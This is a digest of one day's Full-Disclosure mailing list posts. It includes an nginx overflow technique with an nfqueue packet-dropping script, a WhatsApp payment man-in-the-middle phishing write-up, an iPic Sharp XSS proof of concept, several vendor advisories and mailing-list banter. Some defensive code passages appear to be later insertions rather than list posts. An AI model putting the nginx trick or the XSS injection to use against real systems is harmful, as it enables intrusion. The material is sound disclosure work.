Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets

2013-07-24 Thread Albert Puigsech Galicia
Hello everybody,


 Ioctl is needed to set the nginx socket blocking so another call to
write(2) will read much more memory than it is possible with the default
non-blocking connection of nginx.


This vulnerability was published recently and it seems that many exploiters
got stuck because the socket will not block, as the buffer is longer than
the standard Ethernet MTU; some others have found another attack vector
without that problem.

Let me explain how we have managed to overcome the non-blocking socket
impediment without doing too much:


When packets arrive at the TCP layer they are analyzed and, once their
sequence is determined, are immediately delivered to the upper layer of the OSI model.

Let's imagine that you want to overflow a big buffer through the network.
Normally you would execute something like;

send(sock, A….A,…);

If the size of the data is bigger than the MTU, it is split into multiple
packets. The destination processes the information in many smaller
packets instead of one. In summary, the read()/recv() doesn't get all the
data and the overflow doesn't happen.

And that's what's happening on nginx.



What we have done to prevent the packets from being delivered directly to the next
layer is take advantage of TCP windows and TCP reordering: sending the first
packet in the last place.

What happens is that the TCP stack will not deliver the packets to the next
layer because the information is not complete, and just waits until all the
information (up to the size of the TCP window) is received to deliver it.

Then the application layer will get all the information in _the same_ read
and the overflow will happen.



Using that TCP trick, the size limitation of the overflow is the TCP window
size instead of the MTU.



One easy and **dirty** way to implement this is using iptables and nfqueue,
but there are some better ones:

# iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE
# python nfq.py

Regards,



===/ nfq.py /===
import nfqueue
import socket
import time

data_count = 0
delayed = None

def cb(dummy, payload):
    global data_count
    global delayed
    data = payload.get_data()
    # DIRTY for first data package (not three-way-handshake)
    if len(data) > 60:
        data_count += 1
        if data_count == 1:
            delayed = payload
            print data
            # Just DROP the packet and the local TCP stack will send it again
            # because it won't get the ACK.
            payload.set_verdict(nfqueue.NF_DROP)
        else:
            # Every other data packet is let through untouched.
            payload.set_verdict(nfqueue.NF_ACCEPT)
    else:
        # Small packets (handshake, ACKs) reset the counter and pass.
        data_count = 0
        payload.set_verdict(nfqueue.NF_ACCEPT)


q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0)
try:
    q.try_run()
except KeyboardInterrupt:
    print "Exiting..."
q.unbind(socket.AF_INET)
q.close()
===/ nfq.py /===




-- 
Albert Puigsech Galicia
+ Mail: alb...@puigsech.com
+ Jabber: alb...@puigsech.com
+ Twitter: @apuigsech
+ Web: http://int3pids.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread MG


We have sent info about vulnerabilities using all forms, also by direct e-mail to
supp...@dropbox.com, and we had a chat….

After 2 weeks we got an answer from a robot:


---
You can add a response by replying to this email.
Please be sure to reply with the same email address that you used to originally 
contact us.


Dropbox Support, Jul 24 01:44 am (PDT):

Hello,

Thank you for writing to us. Although we would like to answer all the questions 
we receive, we can not do it now.

If you need to restore multiple files, follow these steps: 
https://www.dropbox.com/help/400

Please also check our help center to find answers to frequently asked 
questions: https://www.dropbox.com/help

Sorry for the inconvenience.
Dropbox team

-

So the only way is to post all vulnerabilities to FD ?


regards,

Maciej Gojny 





[Full-disclosure] [ MDVSA-2013:198 ] libxml2

2013-07-24 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:198
 http://www.mandriva.com/en/support/security/
 ___

 Package : libxml2
 Date: July 24, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in libxml2:
 
 A denial of service flaw was found in the way libxml2, a library
 providing support to read, modify and write XML and HTML files,
 performed string substitutions when entity values for external
 entity references replacement (--noent option) was requested /
 enabled during the XML file parsing. A remote attacker could provide
 a specially-crafted XML file containing an external entity expansion,
 when processed would lead to excessive CPU consumption (denial of
 service) (CVE-2013-0339). This is a different flaw from CVE-2013-0338.
 
 parser.c in libxml2 before 2.9.0, as used in Google Chrome before
 28.0.1500.71 and other products, allows remote attackers to cause
 a denial of service (out-of-bounds read) via a document that ends
 abruptly, related to the lack of certain checks for the XML_PARSER_EOF
 state (CVE-2013-2877).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877
 https://bugzilla.redhat.com/show_bug.cgi?id=915149
 https://bugzilla.redhat.com/show_bug.cgi?id=983204
 http://advisories.mageia.org/MGASA-2013-0218.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com




Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread MG
@Feighen
@ Malte Batram
I was also trying all these… (security… etc…). Support via chat requested that I
send the info to support@.
regards,
Maciej Gojny


Message written by Feighen Oosterbroek feig...@gmail.com on 24 Jul 2013, at 11:56:

 Hey Maciej
 
 Not too sure if you've tried any of the security type addresses as listed by 
 rfc2142
 
 http://www.ietf.org/rfc/rfc2142.txt
 
 4.  NETWORK OPERATIONS MAILBOX NAMES
 
Operations addresses are intended to provide recourse for customers,
providers and others who are experiencing difficulties with the
organization's Internet service.
 
    MAILBOX    AREA                USAGE
    -------    ----                -----
    ABUSE      Customer Relations  Inappropriate public behaviour
    NOC        Network Operations  Network infrastructure
    SECURITY   Network Security    Security bulletins or queries
 
 perhaps give them a try?
 
 Thanks and kind regards
 Feighen
 
 
 On 24 July 2013 11:29, MG v...@ariko-security.com wrote:
 
 
 We have sent info about vulnerabilities using all forms, also direct e-mail 
 supp...@dropbox.com,  we had chat….
 
 After 2 weeks we have got answer from robot:
 
 
 ---
 You can add a response by replying to this email.
 Please be sure to reply with the same email address that you used to 
 originally contact us.
 
 
 Dropbox Support, Jul 24 01:44 am (PDT):
 
 Hello,
 
 Thank you for writing to us. Although we would like to answer all the 
 questions we receive, we can not do it now.
 
 If you need to restore multiple files, follow these steps: 
 https://www.dropbox.com/help/400
 
 Please also check our help center to find answers to frequently asked 
 questions: https://www.dropbox.com/help
 
 Sorry for the inconvenience.
 Dropbox team
 
 -
 
 So the only way is to post all vulnerabilities to FD ?
 
 
 regards,
 
 Maciej Gojny 
 
 
 
 
 
 


Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread Mysterie
Hello,

I've contacted them a few times by e-mail (secur...@dropbox.com) without
problems.

https://www.dropbox.com/terms :
If you have any questions about security on our website, you can view our
Security Overview Page or contact us at secur...@dropbox.com

They even have a greetz page https://www.dropbox.com/special_thanks

Best regards,


2013/7/24 MG v...@ariko-security.com

 @Feighen

 @ Malte Batram

 I was trying also all these…(security… etc…)  Support via chat - requested 
 to send info to support@

 regards,

 Maciej Gojny



 Message written by Feighen Oosterbroek feig...@gmail.com on 24 Jul 2013,
 at 11:56:

 Hey Maciej

 Not too sure if you've tried any of the security type addresses as listed
 by rfc2142

 http://www.ietf.org/rfc/rfc2142.txt

 4.  NETWORK OPERATIONS MAILBOX NAMES

Operations addresses are intended to provide recourse for customers,
providers and others who are experiencing difficulties with the
organization's Internet service.

    MAILBOX    AREA                USAGE
    -------    ----                -----
    ABUSE      Customer Relations  Inappropriate public behaviour
    NOC        Network Operations  Network infrastructure
    SECURITY   Network Security    Security bulletins or queries


 perhaps give them a try?


 Thanks and kind regards

 Feighen



 On 24 July 2013 11:29, MG v...@ariko-security.com wrote:



 We have sent info about vulnerabilities using all forms, also direct
 e-mail supp...@dropbox.com,  we had chat….

 After 2 weeks we have got answer from robot:


 ---
 You can add a response by replying to this email.

 Please be sure to reply with the same email address that you used to
 originally contact us.
 --

 *Dropbox Support, Jul 24 01:44 am (PDT):*
 *
 *
 Hello,

 Thank you for writing to us. Although we would like to answer all the
 questions we receive, we can not do it now.

 If you need to restore multiple files, follow these steps:
 https://www.dropbox.com/help/400

 Please also check our help center to find answers to frequently asked
 questions: https://www.dropbox.com/help

 Sorry for the inconvenience.
 Dropbox team

 -

 So the only way is to post all vulnerabilities to FD ?


 regards,

 Maciej Gojny






Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Gary Baribault
That does sound more likely

Gary  B

 On 07/23/2013 07:55 PM, Daniël W. Crompton wrote:

 I think he's collecting the names of people he can direct market to.

 D.



 On 24 July 2013 01:04, valdis.kletni...@vt.edu
 mailto:valdis.kletni...@vt.edu wrote:

 On Mon, 22 Jul 2013 21:23:08 -0500, Bob iPhone Kim said:

  BUT... turns out that about half of the people we mentioned are
 NOT looking
  for new clients.

 ironic_trombone.wav

 So are you making a list of actual top consultants, or a list of
 those people who have free time to read F-D precisely because they
 *aren't* top consultants?





 -- 
 blaze your trail

 -- 
 Daniël W. Crompton daniel.cromp...@gmail.com
 mailto:daniel.cromp...@gmail.com


 http://specialbrands.net/

 http://twitter.com/webhat
 http://www.facebook.com/webhat
 http://plancast.com/webhat
 http://www.linkedin.com/in/redhat




Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Vulnerability Lab
http://www.evolution-sec.com
International Team, Top Researchers and Consultants, Certified
Consultants, Public References and Information.

~bkm

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com




Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread Feighen Oosterbroek
Hey Maciej

Not too sure if you've tried any of the security type addresses as listed
by rfc2142

http://www.ietf.org/rfc/rfc2142.txt

4.  NETWORK OPERATIONS MAILBOX NAMES

   Operations addresses are intended to provide recourse for customers,
   providers and others who are experiencing difficulties with the
   organization's Internet service.

   MAILBOX    AREA                USAGE
   -------    ----                -----
   ABUSE      Customer Relations  Inappropriate public behaviour
   NOC        Network Operations  Network infrastructure
   SECURITY   Network Security    Security bulletins or queries


perhaps give them a try?


Thanks and kind regards

Feighen



On 24 July 2013 11:29, MG v...@ariko-security.com wrote:



 We have sent info about vulnerabilities using all forms, also direct
 e-mail supp...@dropbox.com,  we had chat….

 After 2 weeks we have got answer from robot:


 ---
 You can add a response by replying to this email.

 Please be sure to reply with the same email address that you used to
 originally contact us.
 --

 *Dropbox Support, Jul 24 01:44 am (PDT):*
 *
 *
 Hello,

 Thank you for writing to us. Although we would like to answer all the
 questions we receive, we can not do it now.

 If you need to restore multiple files, follow these steps:
 https://www.dropbox.com/help/400

 Please also check our help center to find answers to frequently asked
 questions: https://www.dropbox.com/help

 Sorry for the inconvenience.
 Dropbox team

 -

 So the only way is to post all vulnerabilities to FD ?


 regards,

 Maciej Gojny






Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Julius Kivimäki
Why am I not surprised vulnlab is the first one to post here to advertise
themselves?


2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com

 http://www.evolution-sec.com
 International Team, Top Researchers and Consultants, Certified
 Consultants, Public References and Information.

 ~bkm

 --
 VULNERABILITY LABORATORY RESEARCH TEAM
 DOMAIN: www.vulnerability-lab.com
 CONTACT: resea...@vulnerability-lab.com



[Full-disclosure] Phishing Google Wallet and Paypal by abusing WhatsApp

2013-07-24 Thread Curesec Research Team
Hi List,

please find the vulnerability description within this post.

Cheers,
 Curesec Research Team

Reference:
https://cureblog.de/2013/07/phishing-google-wallet-and-paypal-by-abusing-whatsapp/


Phishing Google Wallet and Paypal by abusing WhatsApp

-=Introduction=-

WhatsApp is one of the most commonly used tools, aka 'Apps', on
smartphone devices with access to wireless networks or a so-called
data 'flatrate'. By using the internet link to communicate, people do
not have to pay any extra fees for sending a text message somewhere,
even if the receiver is in another country.

WhatsApp is available for almost every architecture on the market. The
program exists for Nokia, Blackberry, Android and iOS. It is available
here: https://www.whatsapp.com. This post will focus on the version for
android.

The app is free for one year on Android devices. After that time the
user has to buy a yearly license. The application provides 3 methods of
payment:

google wallet
paypal
payment link.

They can be selected via Menu-Settings-Account-Payment Info.

-=Bug=-

Google-wallet and Paypal payments work in the same way. When selecting
it, WhatsApp opens an in-app browser and contacts its main server
www.whatsapp.com with the request:

/payments/google.php?phone=<phone>&cksum=<request checksum>&sku=1&lg=en&lc=US

or

/payments/paypal.php?phone=<phone>&cksum=<request checksum>&sku=1&lg=en&lc=US

Responding to this request the browser gets redirected to the proper
checkout service.
The payment link option seems to be currently not working, i.e., nothing
happens.

-=Attacks=-

Even though the communication with the payment systems is HTTPS secured,
the initial contact with the main server www.whatsapp.com is NOT, as we
can see in the Wireshark logs:

GET /payments/google.php?phone=x&cksum=checksum&sku=1&lg=en&lc=US HTTP/1.1
Host: www.whatsapp.com
Accept-Encoding: gzip
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.7)
Cookie: __utmmobile=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

After Whatsapp sent this unencrypted request, it will receive the
following answer.

HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.7
Content-type: text/html
Transfer-Encoding: chunked
Date: Mon, 10 May 2013 05:34:36 GMT
Server: lighttpd/1.4.31
5e4

<html>
<head>
<meta name="HandheldFriendly" content="true"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WhatsApp Messenger payment</title>
</head>
<body onLoad="document.getElementById('google').submit()">
<p>Please wait...</p>
<form id="google" method="POST" action="https://checkout.google.com/api/checkout/v2/checkoutForm/Merchant/xx"
      accept-charset="utf-8">
<input type="hidden" name="shopping-cart.items.item-1.item-name"
       value="One year of WhatsApp service for phone XXX"/>
<input type="hidden" name="shopping-cart.items.item-1.item-description"
       value="WhatsApp Messenger"/>
<input type="hidden" name="shopping-cart.items.item-1.merchant-item-id" value="1"/>
<input type="hidden" name="shopping-cart.items.item-1.merchant-private-item-data"
       value="XXX"/>
<input type="hidden" name="shopping-cart.items.item-1.unit-price" value="0.99"/>
<input type="hidden" name="shopping-cart.items.item-1.unit-price.currency" value="USD"/>
<input type="hidden" name="shopping-cart.items.item-1.quantity" value="1"/>
<input type="hidden" name="shopping-cart.items.item-1.digital-content.display-disposition"
       value="OPTIMISTIC"/>
<input type="hidden" name="shopping-cart.items.item-1.digital-content.email-delivery"
       value="true"/>
<input type="hidden" name="checkout-flow-support.merchant-checkout-flow-support.continue-shopping-url"
       value="http://www.whatsapp.com/payments/success.php"/>
<input type="hidden" name="_charset_" />
</form>
</body>
</html>
0

This means an attacker could intercept the first request via a suitable
man-in-the-middle attack and successfully redirect the user to any
webpage when the user is trying to buy WhatsApp credit. To gain
user accounts the attacker could set up a fake Google Wallet or PayPal
page to harvest user accounts. It might even be possible to
directly gather money through this, for instance by letting the user pay the
0,99 cents via Google Wallet or PayPal to the account of the attacker.

Besides, an attacker could forward some other content, like a webpage with
a new apk supposedly necessary for using Google Wallet or PayPal, like the
(in)famous Zitmo Trojan did when a banking site was visited, giving
users some extra "Security" features.

-=Practical abuse of the bug=-

As buying the credit only happens once per year, the attack itself is
unlikely to be practical for large-scale misuse, as the attacker needs
to be in control of the wireless or GSM network to intercept and
redirect the traffic.

-=Affected Versions=-

2.9.6447 to 2.10.751 (latest as of 2013 July 2)
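As an added illustration of the defensive check this report implies (not code from Curesec or WhatsApp), the following audits a captured payment-bootstrap exchange: it flags a cleartext fetch of an auto-submitting checkout form and verifies the form's target host, scheme and price. The capture is a constructed sample shaped like the exchange quoted above, the trusted-host allowlist and the expected price are assumptions, and 203.0.113.5 is an RFC 5737 documentation address standing in for a tampered target.

```python
"""Audit a captured payment-bootstrap exchange for the weakness described in
the post: the app fetches an auto-submitting checkout form over plain HTTP,
so whoever controls that hop also controls where the payment goes.

Added example, not code from Curesec or WhatsApp. The capture is a
constructed sample shaped like the request/response quoted in the post; the
trusted-host allowlist and expected price are assumptions for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: how the bootstrap page was fetched, and what came back.
REQUEST_HOST = "www.whatsapp.com"
REQUEST_TLS = False  # the exchange in the post was captured on a cleartext connection

RESPONSE_BODY = """<html><head><title>WhatsApp Messenger payment</title></head>
<body onLoad="document.getElementById('google').submit()">
<p>Please wait...</p>
<form id="google" method="POST"
      action="https://checkout.google.com/api/checkout/v2/checkoutForm/Merchant/xx">
<input type="hidden" name="shopping-cart.items.item-1.unit-price" value="0.99"/>
<input type="hidden" name="shopping-cart.items.item-1.unit-price.currency" value="USD"/>
</form></body></html>"""

# What a tampered response would look like: same page, checkout target swapped.
# 203.0.113.5 is a documentation address (RFC 5737), not a real host.
TAMPERED_BODY = RESPONSE_BODY.replace(
    "https://checkout.google.com/api/checkout/v2/checkoutForm/Merchant/xx",
    "http://203.0.113.5/wallet")

# Assumed allowlist of processors the app is expected to hand the user to.
TRUSTED_CHECKOUT_HOSTS = {"checkout.google.com", "www.paypal.com"}
EXPECTED_PRICE = ("0.99", "USD")


class FormCollector(HTMLParser):
    """Collect each <form> with its action, method and hidden inputs, and note
    whether <body onLoad> submits a form without user interaction."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.autosubmit = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "body" and "submit()" in (a.get("onload") or ""):
            self.autosubmit = True
        elif tag == "form":
            self.forms.append({"id": a.get("id"), "action": a.get("action") or "",
                               "method": (a.get("method") or "GET").upper(),
                               "fields": {}})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "hidden":
            self.forms[-1]["fields"][a.get("name") or ""] = a.get("value") or ""


def audit_bootstrap(request_tls, request_host, body, trusted_hosts=TRUSTED_CHECKOUT_HOSTS):
    """Return a list of findings for one bootstrap exchange; empty means clean."""
    findings = []
    if not request_tls:
        findings.append("bootstrap request to %s was sent over cleartext HTTP" % request_host)
    parser = FormCollector()
    parser.feed(body)
    for form in parser.forms:
        target = urlsplit(form["action"])
        if target.scheme != "https":
            findings.append("form %s posts over %s" % (form["id"], target.scheme or "a relative URL"))
        if target.hostname not in trusted_hosts:
            findings.append("form %s posts to untrusted host %s" % (form["id"], target.hostname))
        price = (form["fields"].get("shopping-cart.items.item-1.unit-price"),
                 form["fields"].get("shopping-cart.items.item-1.unit-price.currency"))
        if price != EXPECTED_PRICE:
            findings.append("form %s carries unexpected price %r" % (form["id"], price))
        if parser.autosubmit and not request_tls:
            findings.append("form %s is auto-submitted, so a man-in-the-middle on the "
                            "cleartext hop chooses the checkout destination" % form["id"])
    return findings


if __name__ == "__main__":
    for label, body in (("as captured", RESPONSE_BODY), ("tampered", TAMPERED_BODY)):
        print(label)
        for finding in audit_bootstrap(REQUEST_TLS, REQUEST_HOST, body):
            print("  -", finding)
```

Fetching the bootstrap page over HTTPS (request_tls=True) with the untampered body yields no findings, which is the fix the report points at.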



[Full-disclosure] [Security-news] SA-CONTRIB-2013-060 - Scald - Cross Site Scripting (XSS)

2013-07-24 Thread security-news
View online: https://drupal.org/node/2049415

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-060
  * Project: Scald [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2013-July-24
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

This module enables you to handle media assets (atoms) in Drupal with a
Views-based library, drag and drop interface and manage content
attribution/licensing/distribution.

The module doesn't sufficiently filter atom properties such as the atom title
when outputting atoms, thereby exposing a Cross Site Scripting (XSS)
vulnerability.

This vulnerability is mitigated by the fact that an attacker must have a role
with the permission to create atoms and the Scald Flash module or the
resource management feature (in the MEE submodule) must be enabled.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Scald 6.x-1.x versions prior to 6.x-1.0-beta3.
  * Scald 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Scald [4]
module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the Scald module for Drupal 6.x, upgrade to Scald 6.x-1.0-beta3
[5]
  * If you use the Scald module for Drupal 7.x, upgrade to Scald 7.x-1.1 [6]

Also see the Scald [7] project page.

 REPORTED BY  
-

  * Klaus Purer [8] of the Drupal Security Team

 FIXED BY  


  * Franck Deroche [9] the module maintainer
  * Hai-Nam Nguyen [10] the module maintainer

 COORDINATED BY  
--

  * Klaus Purer [11] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing
secure code for Drupal [14], and securing your site [15].


[1] http://drupal.org/project/scald
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/scald
[5] https://drupal.org/node/2049239
[6] https://drupal.org/node/2049251
[7] http://drupal.org/project/scald
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/59710
[10] http://drupal.org/user/210762
[11] http://drupal.org/user/262198
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration



[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager

2013-07-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video 
Surveillance Manager

Advisory ID: cisco-sa-20130724-vsm

Revision 1.0

For Public Release 2013 July 24 16:00  UTC (GMT)

+-

Summary
===

The Cisco Video Surveillance Manager (VSM) allows operations managers and 
system integrators to build customized video surveillance networks to meet 
their needs. Cisco VSM provides centralized configuration, management, display, 
and control of video from Cisco and third-party surveillance endpoints. 
Multiple security vulnerabilities exist in versions of Cisco VSM prior to 
7.0.0, which may allow an attacker to gain full administrative privileges on 
the system.

More information on Cisco VSM can be found at 
http://www.cisco.com/en/US/products/ps10818/index.html.

Cisco has released software updates that address these vulnerabilities. 
Workarounds that mitigate these vulnerabilities are available.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm



[Full-disclosure] iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability

2013-07-24 Thread Vulnerability Lab
Title:
==
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability


Date:
=
2013-07-24


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1031


VL-ID:
=
1031


Common Vulnerability Scoring System:

3.6


Introduction:
=
iPic Sharp Pro is a photo/video management app. It can manage your photos/videos
in folders and subfolders, compress photos/folders into a zip file and extract
photos from a compressed (zip/rar) file, use a password to protect your files,
and transfer photos/(zip/rar) between your computer and your devices.

Password protect
Password lock entire app
Password lock wifi
Password lock individual folder

View Photos
Photo gallery
Slide show
Thumbnail preview
View Photos app

File Sharing
USB File Sharing via iTunes
Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9 
(Slide show )
Chrome and Firefox Supported upload multiple files
Email multiple files, folder Supported

Archives
Extract photos from a compressed zip/rar file
Compression files/folders to zip file
Archives rename, email, batch

( Copy of the Homepage: 
https://itunes.apple.com/en/app/ipic-sharp-pro/id449820537 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a persistent input 
validation vulnerability in the iPic Sharp v1.2.1 application (Apple iOS - iPad 
& iPhone).


Report-Timeline:

2013-07-24:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: iPic Sharp - Application 1.2.1


Exploitation-Technique:
===
Local


Severity:
=
Medium


Details:

A persistent input validation web vulnerability is detected in the iPic Sharp 
v1.2.1 application (Apple iOS - iPad & iPhone).
The bug allows an attacker (remote) to implement/inject malicious script code 
on the application side (persistent) of the device.

The vulnerability is located in the index file dir listing module of the 
web-server (http://localhost:41493) when processing to 
request via POST method local manipulated `album folder names`. The persistent 
script code will be executed in the main 
index file dir listing module when the service lists the new malicious injected 
foldername as separate item. Attackers can locally 
change the normal album names inside of the apple iOS device (ipad or iphone) 
to execute the code when a user is requesting the 
mobile application index with the foldername listing.

Exploitation of the persistent web vulnerability requires low user interaction 
and a local privilege application  device account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent 
web attacks, persistent phishing or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
[+] iPic Sharp v1.2.1 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index File Dir - Foldername Listing


Proof of Concept:
=
The persistent input validation web vulnerability can be exploited by local 
attackers with low user interaction and no privileged mobile web application 
user account. For demonstration or reproduce ...

PoC: Root Parameter

{'isSecret'0,'isSame'1,'isDelete'0,'guid''136'','albumtype'137,'items'[{'PhotoSharp_System_Photo'[{'name''Camera
 
Roll','isdir'1,'id'0,'filesize'0,'modDate''','url''(null)','section''PhotoSharp_System_Photo','localsection''System
 Photos','ispass'0}]},
{'PhotoSharp_Local_Photo'[{'name''.[PERSISTENT INJECTED SCRIPT 
CODE!]','isdir'1,'id'0,'filesize'102,'modDate''2013-07-20 
145009','url''','section''PhotoSharp_Local_Photo','localsection''Local 
Photos','ispass'0}]},
{'PhotoSharp_Local_Document'[{'name''PhotoSharp_Local_Document','isdir'1,'id'0,'filesize'0,'modDate''','url'''
,'section''PhotoSharp_Local_Document','localsection''[PERSISTENT INJECTED 
SCRIPT CODE!]','ispass'0}]}],'dir''','dirlocal'''}


PoC: Source

<tr><td class=photoTd classname=photoTd><div id=PhotoSharp_System_Photo_0 
class=watermarkStart classname=watermarkStart><a 
href=javascript:loadDir('%2Fu%2FCamera%2520Roll%3FisSystem%3D1','PhotoSharp_System_Photo_0',
'%2Fu%2FCamera%2520Roll');><img 
src=iPic%20Sharp_files/Camera%2520Roll_75_75.jpg 
id=img_PhotoSharp_System_Photo_0 
realurl=(null) class=logoStart classname=logoStart></a><span 
class=spanAlbum classname=spanAlbum>Camera Roll</span></div></td>
<td class=photoTd classname=photoTd><div id=PhotoSharp_Local_Photo_0 
class=watermarkStart classname=watermarkStart>
<a 
href=javascript:loadDir('%2Fu%2F.Default%2520Album%3FisSystem%3D0','PhotoSharp_Local_Photo_0','%2Fu%2F.[PERSISTENT
 INJECTED SCRIPT CODE!]');>
<img src=[PERSISTENT INJECTED SCRIPT
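The listing source above splices the folder name straight into the HTML and into a javascript: URL string literal, which is what lets a renamed album carry script into the index page. As an added example (not from the advisory or the app), the following shows how a listing could render each album entry so that the name is always treated as data; the function names and the "thumbs/" path are hypothetical.

```javascript
// Added example (not from the advisory or the app): escaping a user-controlled
// album folder name before it is placed in the directory-listing HTML.
// Function names and the "thumbs/" path are hypothetical.

// Escape for HTML text nodes and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build one album cell. Instead of a javascript: URL with the folder name
// spliced into a string literal (the pattern in the PoC source above), the
// path travels in a data attribute and the click handler is bound from script.
function renderAlbumCell(section, index, folderName, isSystem) {
  const domId = `${section}_${index}`;
  // Percent-encoded path in the shape loadDir() receives, isSystem as a query flag.
  const path = `/u/${encodeURIComponent(folderName)}?isSystem=${isSystem ? 1 : 0}`;
  return (
    `<td class="photoTd"><div id="${escapeHtml(domId)}" class="watermarkStart">` +
    `<a href="#" class="albumLink" data-path="${escapeHtml(path)}" ` +
    `data-target="${escapeHtml(domId)}">` +
    `<img src="thumbs/${encodeURIComponent(folderName)}_75_75.jpg" class="logoStart">` +
    `</a><span class="spanAlbum">${escapeHtml(folderName)}</span></div></td>`
  );
}

// Client side: bind clicks once and pass the stored path to the app's loadDir().
function wireAlbumLinks(root, loadDir) {
  for (const a of root.querySelectorAll('a.albumLink')) {
    a.addEventListener('click', (ev) => {
      ev.preventDefault();
      loadDir(a.dataset.path, a.dataset.target);
    });
  }
}

// Self-check with a constructed hostile folder name: the markup it would have
// broken out of now contains it only as escaped text.
function demo() {
  const hostile = '"><img src=x onerror=alert(1)>';
  return renderAlbumCell('PhotoSharp_Local_Photo', 0, hostile, false);
}

console.log(demo());
```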

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Bob iPhone Kim
OK... guys...

I figured out a simple way to organize and get you on the Top 100 Infosec
Consultants List at:
-
http://sparkah.com/top-infosec-information-security-and-network-security-consultants-in-the-world/


Just add your name, url, and avatar to this google docs form and I'll just
copy-paste you into the list as I delete some of the guys on the list who
aren't looking for clients...

here it is... http://bit.ly/13bBB8E

Robert Kim
http://sparkah.com
San Diego, CA
310 598 1606

On Wed, Jul 24, 2013 at 7:40 AM, Julius Kivimäki
<julius.kivim...@gmail.com> wrote:

> Why am I not surprised vulnlab is the first one to post here to advertise
> themselves?
>
>
> 2013/7/24 Vulnerability Lab <resea...@vulnerability-lab.com>
>
>> http://www.evolution-sec.com
>> International Team, Top Researchers and Consultants, Certified
>> Consultants, Public References and Information.
>>
>> ~bkm
>>
>> --
>> VULNERABILITY LABORATORY RESEARCH TEAM
>> DOMAIN: www.vulnerability-lab.com
